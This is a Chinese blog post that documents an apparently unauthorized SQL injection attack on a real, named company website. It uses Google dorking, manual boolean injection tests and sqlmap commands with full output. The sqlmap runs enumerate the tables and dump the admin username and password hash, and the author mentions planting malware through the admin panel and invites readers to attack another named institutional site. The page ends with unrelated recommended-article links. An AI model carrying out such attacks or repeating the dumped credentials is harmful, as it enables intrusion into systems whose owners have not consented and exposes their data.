天空里的飞鸟
天空里的飞鸟

SQL注入之实践--初试小刀

1、sql注入的原理
sql注入是针对web客户端在提交数据时未对用户数据进行过滤,导致用户的特殊字符在数据库里被执行而导致的高危漏洞,恶意的可以删除整个数据库,提权到服务器挂马等。
一般acess数据库没有过滤的话直接暴库,但是不能提权哦,比较喜欢的还是mysql、sqlserver,可以提权,进行挂马等操作。之前在google上搜了一大堆具有sql injured的网站,今天就找一两个细致的演练一番。
2、sql注入google搜索
google搜索能帮我们找到我们想要的输入参数的网站,其基本语法很多,就举一个简单的例子:inrul:?id= ,可以看到搜索的结果;其实个人觉得百度上现在也能搜索,而且大部分都是中文比较好看点。
找到一个网站,试了下第一个就可以:http://www.inbond-cn.com/showproducts.asp?id=91
SQL注入之实践--初试小刀_第1张图片
3、sql注入之测试
http://www.inbond-cn.com/showproducts.asp?id=91 and 1=1 页面显示如初
http://www.inbond-cn.com/showproducts.asp?id=91 and 1=2 页面显示东西少了,其实就是没有到数据库里面读出数据,因为and 1=2错误。
http://www.inbond-cn.com/showproducts.asp?id=91 and exists(select * from product) 页面显示正常,因为页面是product页面,所以猜测数据库里有product
到这一步基本上可以确定这个网站有注入漏洞了。
SQL注入之实践--初试小刀_第2张图片

4、sqlmap跑起来
(1)启动sqlmap 不多说了,之前讲过。先看下什么数据库,运行命令:sqlmap.py -u http://www.inbond-cn.com/showproducts.asp?id=91 --dbs

c:\Python27\sqlmap>sqlmap.py -u http://www.inbond-cn.com/showproducts.asp?id=91 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0.6.66#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:17:19

[10:17:19] [INFO] resuming back-end DBMS 'microsoft access'
[10:17:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=91 AND 9285=9285
---
[10:17:20] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[10:17:20] [WARNING] on Microsoft Access it is not possible to enumerate databases (use only '--tables')
[10:17:20] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.inbond-cn.com'
结果显示是Access数据库,哎,不能提权。
(2)Access直接暴库赛
c:\Python27\sqlmap>sqlmap.py -u http://www.inbond-cn.com/showproducts.asp?id=91 --tables
         _
 ___ ___| |_____ ___ ___  {1.0.6.66#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:19:32

[10:19:32] [INFO] resuming back-end DBMS 'microsoft access'
[10:19:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=91 AND 9285=9285
---
[10:19:33] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[10:19:33] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[10:19:33] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[10:19:33] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:19:33] [INFO] retrieved:
[10:19:34] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[10:19:34] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[10:19:34] [ERROR] cannot retrieve table names, back-end DBMS is Access
Database: Microsoft_Access_masterdb
[8 tables]
+----------+
| admin    |
| download |
| feedback |
| market   |
| news     |
| product  |
| province |
| vote     |
+----------+

[10:19:34] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.inbond-cn.com'
看到没直接爆出这几张表,我们就看看admin表里的数据吧,猜到后台的话,还可以登录到后台进行网站挂马。
(3)暴出你的用户密码来
这个时间比较长,尼玛,公司里的绩效又是我最少,干活我最多,坑爹,老子早晚走人。

c:\Python27\sqlmap>sqlmap.py -u http://www.inbond-cn.com/showproducts.asp?id=91 --dump -T admin
         _
 ___ ___| |_____ ___ ___  {1.0.6.66#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:04:15

[11:04:15] [INFO] resuming back-end DBMS 'microsoft access'
[11:04:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=91 AND 9285=9285
---
[11:04:16] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[11:04:16] [ERROR] cannot retrieve column names, back-end DBMS is Microsoft Access
[11:04:16] [INFO] fetching entries for table 'admin' in database 'Microsoft_Access_masterdb'
[11:04:16] [INFO] fetching number of entries for table 'admin' in database 'Microsoft_Access_masterdb'
[11:04:16] [INFO] resumed: 1
[11:04:16] [INFO] fetching number of distinct values for column 'id'
[11:04:16] [INFO] resumed: 1
[11:04:16] [INFO] using column 'id' as a pivot for retrieving row data
[11:04:16] [INFO] resumed: 3
[11:04:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:04:16] [INFO] retrieved:
[11:04:19] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[11:04:19] [INFO] retrieved:
[11:04:22] [INFO] resumed: 0
[11:04:22] [INFO] resumed: _\xb7V\xfdKLOTZ
[11:04:22] [INFO] resuming partial value: 2cf8a3beab0297a4
[11:04:22] [INFO] retrieved:
[11:04:26] [INFO] retrieved: admin
[11:04:54] [INFO] retrieved:
[11:05:02] [INFO] analyzing table dump for possible password hashes
[11:05:02] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[11:07:56] [INFO] writing hashes to a temporary file 'c:\users\jlz\appdata\local\temp\sqlmaph_bimp13180\sqlmaphashes-vpiazb.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[11:07:58] [INFO] using hash method 'mysql_old_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Python27\sqlmap\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[11:08:00] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[11:08:07] [INFO] starting dictionary-based cracking (mysql_old_passwd)
[11:08:07] [INFO] starting 4 processes
[11:08:44] [INFO] using suffix '1'
[11:09:18] [INFO] using suffix '123'
[11:09:58] [INFO] using suffix '2'
[11:10:30] [INFO] using suffix '12'
[11:11:02] [INFO] using suffix '3'
[11:11:31] [INFO] using suffix '13'
[11:12:04] [INFO] using suffix '7'
[11:12:37] [INFO] using suffix '11'
[11:13:08] [INFO] using suffix '5'
[11:13:40] [INFO] using suffix '22'
[11:14:15] [INFO] using suffix '23'
[11:14:48] [INFO] using suffix '01'
[11:15:20] [INFO] using suffix '4'
[11:15:55] [INFO] using suffix '07'
[11:16:31] [INFO] using suffix '21'
[11:17:06] [INFO] using suffix '14'
[11:17:39] [INFO] using suffix '10'
[11:18:10] [INFO] using suffix '06'
[11:18:42] [INFO] using suffix '08'
[11:19:12] [INFO] using suffix '8'
[11:19:43] [INFO] using suffix '15'
[11:20:16] [INFO] using suffix '69'
[11:20:46] [INFO] using suffix '16'
[11:21:22] [INFO] using suffix '6'
[11:21:55] [INFO] using suffix '18'
[11:22:32] [INFO] using suffix '!'
[11:23:03] [INFO] using suffix '.'
[11:23:34] [INFO] using suffix '*'
[11:24:04] [INFO] using suffix '!!'
[11:24:34] [INFO] using suffix '?'
[11:25:03] [INFO] using suffix ';'
[11:25:32] [INFO] using suffix '..'
[11:26:04] [INFO] using suffix '!!!'
[11:26:36] [INFO] using suffix ', '
[11:27:08] [INFO] using suffix '@'
[11:27:36] [WARNING] no clear password(s) found
[11:27:36] [INFO] postprocessing table dump
Database: Microsoft_Access_masterdb
Table: admin
[1 entry]
+----+------------+---------+-----------------+-------+---------+----------+------------------+
| id | product_id | unit    | title           | price | key     | username | password         |
+----+------------+---------+-----------------+-------+---------+----------+------------------+
| 3  | NULL       | | _\xb7V\xfdKLOTZ | 0     | | admin    | 2cf8a3beab0297a4 |
+----+------------+---------+-----------------+-------+---------+----------+------------------+

[11:27:36] [INFO] table 'Microsoft_Access_masterdb.admin' dumped to CSV file 'C:\Users\jlz\.sqlmap\output\www.inbond-cn.com\dump\Microsoft_Access_masterdb\admin.csv'
[11:27:36] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.inbond-cn.com'
好了就到这里了,心情不太好 后台用户名密码已经出来了,后台我没猜到,有一个中国城市规划院深圳分院的门户网站,也是一样的道理,acess数据库而且网站后台也可以猜到,大家可以试一试


你可能感兴趣的:(科研项目)

  • 利用ChatGPT辅助撰写课题申报书中的研究框架与内容设计全攻略指南 智写AI AI学术写作指南chatgpt人工智能AIGCAI写作论文笔记
    欢迎关注EssayBot,为大家带来最酷最有效的智能AI学术科研写作攻略。关于使用ChatGPT等AI学术科研的相关问题可以和作者七哥沟通:yida985撰写课题申报书是启动科研项目的第一个步骤,而研究框架与内容设计又是这一过程中的关键要素,它们对课题申报的成功起着决定性作用。研究框架为整个项目提供了一个宏观的结构蓝图,而内容设计则细化了研究活动的每个具体步骤。借助ChatGPT可以更高效地构建和
  • [校招VIP原创出品]24/25届 | 大厂开发岗 | 备战新形势和求职策略 校招VIP 经验分享【校招VIP】课程专栏24届25届秋招校招互联网计算机大厂
    【本文章由校招VIP原创,转载请联系】目录一、24届大厂秋招总结1招聘数量比23届回暖,薪资持平20K-25K2一本是门槛,部分有海笔机会3笔试的通过率低于10%,部分人一次面试也没有4内推在校招没有明显的优势5面试主项目是秒杀、社区等,面试通过率非常低6实验室部分科研项目明显遇冷,重点问实习项目7从结果看,211和985比没有明显区别,一本较低8五大银行开发岗对学校和项目要求更严格二、24届大厂
  • 基于Java中的SSM框架实现校园门户网管理系统项目【项目源码+论文说明】计算机毕业设计 学长是个程序员 项目实践java课程设计校园门户网管理系统毕业设计项目源码网页设计spring
    基于Java中的SSM框架实现校园门户网管理系统演示摘要随着我国高校信息化建设内容的不断完善,很多高校都通过建立校园门户网站的方式搭建起高校与社会之间信息传递的桥梁,通过校园网站的建立来拓宽校园信息传播的渠道,利用全方位的校园环境及师资力量的介绍来吸引更多的学子,同时可以结合当前高校的科研项目及教学资源获取到更多社会面的关注,针对校内岗位缺失的情况可以利用高校的官方门户网站进行招聘信息的发布。通过
  • 推拿实训考核 刘冬咚
    上午因为学校大部分老师在搞科研项目,所以第一二节是自习。三四节针推推拿部分实训考核,真的是不考试不知道自己学习手法的漏洞,考试之前各个手法感觉自己练得还行,真到考试了发现好多细节都忽略了。毕竟细节决定成败,虽然考完了,但是还是要查缺补漏的。既然实训考核分低,那理论知识要好好学结课考试要考好点。下午又是一下午自习,估计又要占周末时间补课了
  • 教科研项目管理系统,项目规划的进度 cc6b6903e5d1
    每周常规的项目状态会议应专注于项目规划的进度。项目管理者可以在其项目状态报告的“状态总结”部分提供正在进行中工作的更新信息,但不应参与或跟踪与正在进行的工作有关的任何任务或障碍。项目管理者需要在执行前确保这个汇报方法得到项目负责人的认可,并将他们的批复意见汇总到会议记录中。在项目刚启动时,很可能实际的工作已经开始了。大多数项目管理人员认为,理想情况下,在项目的规划工作完成之前,不应开始任何实际的工
  • 博士一对一在线学术科研 | 学员心声:在科研的途中,找到真实的自己 21b192e70cf3
    罗同学参加了产业经济学在线学术科研课题,由华中科技大学博士带教,科研结束后,罗同学发来了这段感言。在今年三月的时候,我接触到了博士一对一的科研项目。我计划以后学习与经济学有关的专业,所以我选择通过科研项目来了解一下经济学到底是什么。在着手做科研之前,我对这个项目进行了很多咨询,博士一对一的老师根据我的情况给我推荐了适合我的课程,以便更好地了解经济学。在面试通过以后,老师的选课和规划都非常有条理。第
  • 大学生活 娇娇小可
    因为这就是大学...有人大清早就去了自习室,直到熄灯才回来;有人整天宅在宿舍里玩游戏,熬到半夜中午才起;有人在学生会社团工作很出色,为人行事各种通达;有人收获了爱情,每天从早到晚,眼里只有一个人;有人热爱运动,运动场上永远少不了他的身影;有人找兼职赚钱,为此逃了不少课;有人喜欢旅行,翘课,哪怕没钱,也风雨无阻;有人做科研项目,白天黑夜,完全忘我;有人随波逐流,永远跟着大军,上课下课吃饭睡觉周末休息
  • 原来我们的学习方式一直都是错的—《认知天性》 宇航员Keo
    学习能力,是每一个人的终生能力。《认知天性》是11位世界级认知心理学家,历经10年的科研心血,1套认知规律。亚马逊年度学习畅销书,连续5年高居心理认知榜单Top1。本书是“通过认知心理学强化教育实践”科研项目的成果,重新诠释了学习与记忆的机制,并详细的拆分学习的过程,回答困扰了我们每人成长的一个重要问题:为什么我们很多人非常刻苦的学习,但是学习效果并不好,学的东西总是记不住?和大多数想象中不同,读
  • springboot/java/php/node/python高校科研管理系统【计算机毕设】 python计算机毕设 javaspringbootphp
    本系统(程序+源码)带文档lw万字以上文末可领取本课题的JAVA源码参考系统程序文件列表系统的选题背景和意义选题背景:随着科技的不断发展,高校科研工作已经成为推动社会进步和经济发展的重要力量。然而,当前我国高校科研管理仍存在一些问题,如科研项目管理不规范、科研成果评价体系不完善、科研资源分配不合理等。这些问题不仅影响了高校科研工作的效率,也制约了高校科研水平的提升。因此,建立一个科学、高效、规范的
  • 《如何正确求助》:聪明的人,都懂得“求助”他人 一道成长书屋
    作者:一道一道德国哲学家叔本华说,“单个的人是软弱无力的,就像漂流的鲁滨逊一样;只有同别人在一起,他才能完成许多事业。”因为一个人的力量是有限的,有时不是你不强大,而是不善于合情合理地获取资源和人脉。科研项目缺少问卷调查却迟迟不敢向路人寻求帮助、着急去医院看病但不好意思向熟人开口捎上一程、熬夜加班早起赶地铁,即使困得摇摇晃晃也不舍找旁人求个座位......这些类似的场景,想必很多人遇到过,心中纠结
  • 别给自己设枷锁! 加油吧韩翔
    图片发自App设枷锁,我理解的也就是对自己不自信,否定自己,自我设限。我觉得人最难打破给自己设的枷锁,枷锁一旦形成会在心里障碍,难以逾越。最近各个学校的夏令营的通知都已发出,周围同学都在积极准备申请材料,我也选择了几所学校,在写材料的时候就开始质疑自己,科研项目基本没接触,成绩并没有十分优秀,比赛也只有两三个能拿的出手,我可以吗?我能申请上吗?在准备材料的两天里,我不断的问着自己,质疑自己,心里的
  • 医生副业干什么比较好赚钱,医生副业干什么比较好做? 声优配音圈
    一、医生副业如何赚钱?作为医生,有很多机会可以通过副业赚取额外的收入。下面是一些医生副业赚钱的途径和方法:兼职副业推荐公众号,配音新手圈,声优配音圈,新配音兼职圈,配音就业圈,鼎音副业,有声新手圈,每天更新各种远程工作与在线兼职,职位包括:写手、程序开发、剪辑、设计、翻译、配音、无门槛、插画、翻译、等等。。。每日更新兼职。1.科研合作:医生可以与科研机构合作,参与科研项目,并通过论文发表和科研成果
  • 北京大学AI写作机器人来了,会替代记者? ctrigger
    11月19日下午,在北京大学科技成果发布会上,记者了解到,由该校王选计算机研究所万小军团队研发的AI写作机器人,既能写新闻、做综述,又能发评论、对诗词,他们与多家媒体合作打造的小明、小南、小柯等写作机器人已经陆续上岗。机器人记者写稿更多依赖数据今天下午的成果发布会,也是北京市科技成果转化统筹协调与服务平台系列项目路演之一,来自北大王选计算机研究所的四个科研项目参与路演。其中,万小军带来的“AI写作
  • 基于SSM的高校教师科研信息展示网站的设计与实现 我真的在拉扯QAQ 开发语言springbootjava后端游戏
    系统描述互联网发展至今,无论是其理论还是技术都已经成熟,而且它广泛参与在社会中的方方面面。它让信息都可以通过网络传播,搭配信息管理工具可以很好地为人们提供服务。针对高校教师科研项目展示信息管理混乱,出错率高,信息安全性差,劳动强度大,费时费力等问题,采用高校教师科研信息展示网站可以有效管理,使信息管理能够更加科学和规范。高校教师科研信息展示网站在Eclipse环境中,使用Java语言进行编码,使用
  • 自然科学类学术成果和科研项目分类评价认定标准 MrCharles 大数据人工智能
    自然科学类学术成果和科研项目分类评价认定标准为进一步规范学校自然科学学术管理,提高科研人员科研积极性和创造性,增强学校科学研究实力和学术影响力,根据《教育部关于深化高等学校科技评价改革的意见》(教技[2013]3号),特制定本标准。一、学术论文期刊类别认定1.一类JCR一区(依据中国科学院分区)2.二类(1)JCR二区(依据中国科学院分区)(2)中国计算机学会(CCF)推荐A类会议论文3.三类JC
  • 《罗茜计划》,爱情也能像基因一样被研究,简直不可思议 我在树下等你读书
    内容简介:澳大利亚的大学遗传学副教授,智商无上限、情商无下限的39岁大龄单身男青年唐,为了解决找对象难题,决定启动寻妻计划。他誓要把找对象这件事当作一个科研项目来抓,认为只要设定足够合理的条件,收集足够丰富的样本,真爱就能跟基因研究一样结果妥妥地出现。于是,大龄青年唐开始了他笑点不断、感动不断的寻妻大作战!作者简介:格雷姆·辛浦生,澳大利亚籍作家,现居墨尔本。著有短篇小说、戏剧、剧本,已发表两部纪
  • 计算机毕业设计-----SSH高校科研管理系统平台 小可计算机毕设 计算机毕业论文计算机毕业设计课程设计ssh运维开发语言java数据库python
    项目介绍本项目包含超级管理员、管理员、教师三种角色;超级管理员角色包含以下功能:登录,教师管理,管理员管理等功能。管理员角色包含以下功能:登录,专业参赛奖项管理,科技论文发表管理,出版专业著作管理,科研项目立项管理,科研项目结题管理,科研成果统计管理等功能。教师角色包含以下功能:登录,个人参赛奖项管理,科技论文管理,出版专业著作管理,科研项目立项管理,科研项目结题管理,科研成果统计,个人信息管理等
  • 计算机毕业设计----SSH高校科研管理系统平台 小可计算机毕设 计算机毕业论文计算机毕业设计课程设计ssh运维springintellij-ideamysqlspringcloud
    项目介绍本项目包含超级管理员、管理员、教师三种角色;超级管理员角色包含以下功能:登录,教师管理,管理员管理等功能。管理员角色包含以下功能:登录,专业参赛奖项管理,科技论文发表管理,出版专业著作管理,科研项目立项管理,科研项目结题管理,科研成果统计管理等功能。教师角色包含以下功能:登录,个人参赛奖项管理,科技论文管理,出版专业著作管理,科研项目立项管理,科研项目结题管理,科研成果统计,个人信息管理等
  • 职场窄门笔记24:跟定一个人跟定一个团队 赶着你_成材
    人的成长没有捷径,你自身的优秀是必须的,但优秀的人能够“拔”出来的机会却不一样。纵观历史,在一定的条件下,人才有“成批形成”的优势,特别是战争年代和大的科研项目中,因为人才的聚集、碰撞、引领,机构的高效运转,这种“成批形成”的优势就更为明显。德怀特·戴维·艾森豪威尔历史上有些名人,要说必须要挖掘他们的成功捷径,我看也有那么一条,那就是跟定一个团队,跟定一个人。比如美国的德怀特·戴维·艾森豪威尔,他
  • 关于时间效率,你必须知道的几点 25度的力量
    是否你也有过觉得一年好像相同一天重复365天自己的计划但是往往坚持不下去处理一件事情到处走神走到饮水机才发现自己拿的是笔,不是杯子年初的计划往往只坚持了几天,就草草收尾自己想读的书,总是没有翻开几页就闲置如果你有上面的情况的话,下面的技巧那一定要看一下1.把期待变成目标,延迟满足往往我们的目标不是难如攻克科研项目如何完成这些平凡里的目标,要为目标赋能。抵制现在短期无效的满足,通过修饰目标,来引导自
  • 计算机毕业设计-----SSH高校科研管理系统平台 小星计算机毕设 计算机毕业设计课程设计ssh运维javapython开发语言
    项目介绍本项目包含超级管理员、管理员、教师三种角色;超级管理员角色包含以下功能:登录,教师管理,管理员管理等功能。管理员角色包含以下功能:登录,专业参赛奖项管理,科技论文发表管理,出版专业著作管理,科研项目立项管理,科研项目结题管理,科研成果统计管理等功能。教师角色包含以下功能:登录,个人参赛奖项管理,科技论文管理,出版专业著作管理,科研项目立项管理,科研项目结题管理,科研成果统计,个人信息管理等
  • 干货汇总!2023 年 AI for Science 最值得关注的科研成果梳理 HyperAI超神经 人工智能ScienceAI人工智能AlforScience机器学习
    岁序更替,华章日新。在刚刚过去的2023年中,AIforScience带来了太多惊喜,也埋下了更具想象空间的种子。从2020年开始,以AlphaFold为代表的科研项目将AIforScience推向了AI应用的主舞台。两年来,从生物医药到天文气象、再到材料化学等基础学科,都成为了AI的新战场。在这个过程中,AI的能力也具象化为一柄利刃,甚至可以劈开困扰人们半个世纪的桎梏,大大加速了科研进程。珠玉在
  • 几乎无渗色的图像着色方法 Daniel Muei 个人项目论文阅读图像处理计算机视觉python
    说在前面好久不见,这次给小伙伴们更新几波我本科期间参与的科研项目。按照论文的发表顺序,这篇博客就简单介绍一下我的第一个项目,关于图像着色算法的优化。摘要着色(彩色化)是使用计算机算法给灰度图像添加颜色的过程。目前有几种主流的方法可以为图像着色,包括精确的图像分割算法、深度学习算法和基于手动着色的局部颜色扩展方法。然而,这些方法的一个常见问题是出现“渗色”,即图像中某个区域的颜色溢出到相邻区域。在本
  • 2021年计算机保研夏令营总结 zhSunw 面试
    2021年计算机保研夏令营总结(双非入营985——吉林大学、中南大学)个人情况:本科院校:本科某四非无计算机学科评估院校计算机科学与技术专业,算是保研最底端排名:1/115绩点:4.27/5.00英语:四级489,六级410(没过)竞赛:XCPC四个铜牌,蓝桥杯CB组国一,天梯赛等其他编程比赛一些奖项科研项目:参与一项国家级大创项目荣誉:国奖以及其他奖学金夏令营情况:同2020年,除了hit与xm
  • 关于成就感 Lily喵言
    这一阵股市涨的有点疯狂,我不时的拿着手机看看大盘,分析手里的股票。老爸见了说,你这样研究股票,会不会耽误上课耽误工作。有此引出一番我关于工作,关于成就感的话,老爸听了一声不吭人活着是为了什么?我觉着活着还是应该开心一些,做一些自己喜欢而且觉得有成就感的事情。我现在的工作,无非两个方向,一是做好科研,多发论文,科研项目,二是做好教学,什么精品课程,教研项目,教学名师,管好系室那一摊子。而这两方面我好
  • 计算机毕业设计 SSM学术成果管理系统 学术论文平台 科研项目管理系统 计算机程序老哥
    作者主页:计算机毕业设计老哥有问题可以主页问我一、开发介绍1.1开发环境开发语言:Java数据库:MySQL系统架构:B/S后端:SpringBoot(Spring+SpringMVC+Mybatis)前端:Vue工具:IDEA或者Eclipse,JDK1.8,Maven二、系统介绍2.1图片展示用户注册登录页面:登录前端页面:功能:首页、学术论文、科研项目、学术专著、专利、个人中心、后台管理科研
  • 508|《沧浪之水》读书笔记(七) 裒益者
    池大为在与马厅长一起努力报国家科研项目,这里面呈现了两个特别的逻辑与道理。一个是一个事情,一个项目的成功,离不开软件与硬件的综合成就。二是在人世界,是一个平衡与打破平衡,然后再平衡的道理。先说这个软硬件综合成就的理,厅里要报国家项目,如果没有马厅长和池大为多年的基本积累,没有这些硬件条件,是没有办法入门的。但是,有这些硬件条件的不在少数。而下一步,较量的自然就是软件系统,有大为在部里同学的支持,有
  • ChatGPT到底能做什么呢? Mr.靳靳477302280 人工智能农业gischatgpt
    1、熟练掌握ChatGPT提示词技巧及各种应用方法,并成为工作中的助手。2、通过案例掌握ChatGPT撰写、修改论文及工作报告,提供写作能力及优化工作3、熟练掌握ChatGPT融合相关插件的应用,完成数据分析、编程以及深度学习等相关科研项目。4、掌握各种AI绘图工具,随意生成各类型性图像。5、总结会议参加人员关注问题,现场进行辅助指导及交流。靳老师180-3121-1455专题一、OpenAI20
  • ChatGPT到底可以做什么? 思考的小猴子 遥感生态环境chatgpt人工智能
    1、熟练掌握ChatGPT提示词技巧及各种应用方法,并成为工作中的助手。2、通过案例掌握ChatGPT撰写、修改论文及工作报告,提供写作能力及优化工作3、熟练掌握ChatGPT融合相关插件的应用,完成数据分析、编程以及深度学习等相关科研项目。4、掌握各种AI绘图工具,随意生成各类型性图像。5、总结会议参加人员关注问题,现场进行辅助指导及交流。靳老师180-3121-1455专题一、OpenAI20
  • 大学的选择 小鱼骨头啊
    因为这就是大学...有人大清早就去了自习室,直到熄灯才回来;有人整天宅在宿舍里玩游戏,熬到半夜中午才起;有人在学生会社团工作很出色,为人行事各种通达;有人收获了爱情,每天从早到晚,眼里只有一个人;有人热爱运动,运动场上永远少不了他的身影;有人找兼职赚钱,为此逃了不少课;有人喜欢旅行,翘课,哪怕没钱,也风雨无阻;有人做科研项目,白天黑夜,完全忘我;有人随波逐流,永远跟着大军,上课下课吃饭睡觉周末休息
  • jvm调优总结(从基本概念 到 深度优化) oloz javajvmjdk虚拟机应用服务器
    JVM参数详解:http://www.cnblogs.com/redcreen/archive/2011/05/04/2037057.html   Java虚拟机中,数据类型可以分为两类:基本类型和引用类型。基本类型的变量保存原始值,即:他代表的值就是数值本身;而引用类型的变量保存引用值。“引用值”代表了某个对象的引用,而不是对象本身,对象本身存放在这个引用值所表示的地址的位置。
  • 【Scala十六】Scala核心十:柯里化函数 bit1129 scala
    本篇文章重点说明什么是函数柯里化,这个语法现象的背后动机是什么,有什么样的应用场景,以及与部分应用函数(Partial Applied Function)之间的联系   1. 什么是柯里化函数 A way to write functions with multiple parameter lists. For instance def f(x: Int)(y: Int) is a
  • HashMap dalan_123 java
    HashMap在java中对很多人来说都是熟的;基于hash表的map接口的非同步实现。允许使用null和null键;同时不能保证元素的顺序;也就是从来都不保证其中的元素的顺序恒久不变。 1、数据结构     在java中,最基本的数据结构无外乎:数组 和 引用(指针),所有的数据结构都可以用这两个来构造,HashMap也不例外,归根到底HashMap就是一个链表散列的数据
  • Java Swing如何实时刷新JTextArea,以显示刚才加append的内容 周凡杨 java更新swingJTextArea
    在代码中执行完textArea.append("message")后,如果你想让这个更新立刻显示在界面上而不是等swing的主线程返回后刷新,我们一般会在该语句后调用textArea.invalidate()和textArea.repaint()。 问题是这个方法并不能有任何效果,textArea的内容没有任何变化,这或许是swing的一个bug,有一个笨拙的办法可以实现
  • servlet或struts的Action处理ajax请求 g21121 servlet
    其实处理ajax的请求非常简单,直接看代码就行了: //如果用的是struts //HttpServletResponse response = ServletActionContext.getResponse(); // 设置输出为文字流 response.setContentType("text/plain"); // 设置字符集 res
  • FineReport的公式编辑框的语法简介 老A不折腾 finereport公式总结
    FINEREPORT用到公式的地方非常多,单元格(以=开头的便被解析为公式),条件显示,数据字典,报表填报属性值定义,图表标题,轴定义,页眉页脚,甚至单元格的其他属性中的鼠标悬浮提示内容都可以写公式。 简单的说下自己感觉的公式要注意的几个地方:   1.if语句语法刚接触感觉比较奇怪,if(条件式子,值1,值2),if可以嵌套,if(条件式子1,值1,if(条件式子2,值2,值3)
  • linux mysql 数据库乱码的解决办法 墙头上一根草 linuxmysql数据库乱码
    linux 上mysql数据库区分大小写的配置 lower_case_table_names=1 1-不区分大小写 0-区分大小写   修改/etc/my.cnf 具体的修改内容如下:   [client] default-character-set=utf8   [mysqld] datadir=/var/lib/mysql socket=/va
  • 我的spring学习笔记6-ApplicationContext实例化的参数兼容思想 aijuans Spring 3
    ApplicationContext能读取多个Bean定义文件,方法是: ApplicationContext appContext = new ClassPathXmlApplicationContext( new String[]{“bean-config1.xml”,“bean-config2.xml”,“bean-config3.xml”,“bean-config4.xml
  • mysql 基准测试之sysbench annan211 基准测试mysql基准测试MySQL测试sysbench
    1 执行如下命令,安装sysbench-0.5: tar xzvf sysbench-0.5.tar.gz  cd sysbench-0.5  chmod +x autogen.sh  ./autogen.sh  ./configure --with-mysql --with-mysql-includes=/usr/local/mysql
  • sql的复杂查询使用案列与技巧 百合不是茶 oraclesql函数数据分页合并查询
      本片博客使用的数据库表是oracle中的scott用户表;          -------------------  自然连接查询           查询 smith 的上司(两种方法) &
  • 深入学习Thread类 bijian1013 javathread多线程java多线程
    一.             线程的名字 下面来看一下Thread类的name属性,它的类型是String。它其实就是线程的名字。在Thread类中,有String getName()和void setName(String)两个方法用来设置和获取这个属性的值。 同时,Thr
  • JSON串转换成Map以及如何转换到对应的数据类型 bijian1013 javafastjsonnet.sf.json
            在实际开发中,难免会碰到JSON串转换成Map的情况,下面来看看这方面的实例。另外,由于fastjson只支持JDK1.5及以上版本,因此在JDK1.4的项目中可以采用net.sf.json来处理。 一.fastjson实例 JsonUtil.java package com.study; impor
  • 【RPC框架HttpInvoker一】HttpInvoker:Spring自带RPC框架 bit1129 spring
    HttpInvoker是Spring原生的RPC调用框架,HttpInvoker同Burlap和Hessian一样,提供了一致的服务Exporter以及客户端的服务代理工厂Bean,这篇文章主要是复制粘贴了Hessian与Spring集成一文,【RPC框架Hessian四】Hessian与Spring集成   在 【RPC框架Hessian二】Hessian 对象序列化和反序列化一文中
  • 【Mahout二】基于Mahout CBayes算法的20newsgroup的脚本分析 bit1129 Mahout
    #!/bin/bash # # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information re
  • nginx三种获取用户真实ip的方法 ronin47
    随着nginx的迅速崛起,越来越多公司将apache更换成nginx. 同时也越来越多人使用nginx作为负载均衡, 并且代理前面可能还加上了CDN加速,但是随之也遇到一个问题:nginx如何获取用户的真实IP地址,如果后端是apache,请跳转到<apache获取用户真实IP地址>,如果是后端真实服务器是nginx,那么继续往下看。 实例环境: 用户IP 120.22.11.11
  • java-判断二叉树是不是平衡 bylijinnan java
